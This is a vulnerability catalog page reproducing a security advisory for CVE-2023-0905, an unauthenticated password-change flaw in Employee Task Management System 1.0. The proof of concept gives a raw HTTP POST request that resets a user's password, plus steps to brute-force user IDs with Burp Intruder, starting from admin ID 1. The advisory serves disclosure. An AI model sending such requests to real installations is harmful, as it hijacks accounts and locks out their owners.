Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Employee Task Management System 1.0 Privilege Escalation

🗓️ 24 Feb 2023 00:00:00Reported by Navaid AnsariType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 241 Views

Employee Task Management System 1.0 Privilege Escalation - Broken Authentication leads to unauthorized access and user password chang

Related
Code
`# Employee Task Management System - Broken Authentication leads to compromise of all application accounts by changing the password  
  
### Date:   
> 17 February 2023  
  
### CVE Assigned:  
**[CVE-2023-0905](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0905)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0905), [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0905)  
  
### Author Email:   
> [email protected]  
### Vendor Homepage:  
> https://www.sourcecodester.com  
### Software Link:  
> [Employee Task Management System](https://www.sourcecodester.com/php/15383/employee-task-management-system-phppdo-free-source-code.html)  
### Version:  
> v 1.0  
### Broken Authentication:  
> Broken authentication occurs when the authentication mechanisms in a web application are not implemented correctly, allowing an attacker to bypass them and gain unauthorized access to the application's features and resources. If an attacker is able to exploit broken authentication and gain access to a user's account, they may be able to change the account password, effectively locking the legitimate user out of the system. This is particularly dangerous because if the attacker can compromise one user account, they may be able to use that account to gain access to other accounts and escalate their privileges, potentially compromising the entire system.  
### Affected Page:  
> changePasswordForEmployee.php  
  
> On this page, application isn't verifying the authentication/authorization mechanism. Due to that, all the parameters are vulnerable to broken authentication.  
  
### Description:  
> Broken Authentication allows unauthenticated remote attacker to change password of all application users  
  
### Proof of Concept:  
> Following steps are involved:  
1. Visit the vulnerable page: changePasswordForEmployee.php  
2. Type any random password which needs to update against any user id and submit  
3. Intercept that request through Burp Suite  
4. Request:  
```  
POST /etms/changePasswordForEmployee.php HTTP/1.1  
Host: localhost  
Content-Length: 277  
Cache-Control: max-age=0  
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Windows"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/etms/changePasswordForEmployee.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=ntknjcf821q2u3h85c14qo1r91  
Connection: close  
  
user_id=%3Cbr+%2F%3E%0D%0A%3Cb%3EWarning%3C%2Fb%3E%3A++Undefined+variable+%24user_id+in+%3Cb%3EC%3A%5Cxampp%5Chtdocs%5Cetms%5CchangePasswordForEmployee.php%3C%2Fb%3E+on+line+%3Cb%3E34%3C%2Fb%3E%3Cbr+%2F%3E%0D%0A&password=admin%23123&re_password=admin%23123&change_password_btn=  
```  
5. because the "user_id" parameter is not set due to missing authentication, so we need to set the user_id manually. By default user_id 1 is for admin and we can use intruder to bruteforce this step with incremental value. Whenever the server will find the correct user_id, it will change the password and log in to the application.  
6. Successful exploit screenshots are below (without cookie parameter)  
  
![image](https://user-images.githubusercontent.com/123810418/219798138-747388d7-378b-4d1b-9862-1356e52a0c72.png)  
  
![image](https://user-images.githubusercontent.com/123810418/219798264-f04bcda9-a833-4010-a40b-076a38199938.png)  
  
![image](https://user-images.githubusercontent.com/123810418/219798299-5ba92752-d218-4aaa-b123-5258df37ce38.png)  
  
7. Vulnerable Code Snippets:  
  
![image](https://user-images.githubusercontent.com/123810418/219799518-50d3eb1a-0091-4229-b7d0-7621d79cc168.png)  
  
![image](https://user-images.githubusercontent.com/123810418/219799657-42b9a71c-539c-4e91-bec8-0d7fd40cb3ed.png)  
  
### Recommendation:  
> Whoever uses this CMS, should update the authentication and authorization mechanism on top of the changePasswordForEmployee.php as per their requirement to avoid a Broken Authentication attack  
  
Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Feb 2023 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.03619
broken authenticationprivilege escalationuser account compromiseremote attackvulnerable pageprivilege escalationunauthorized access
241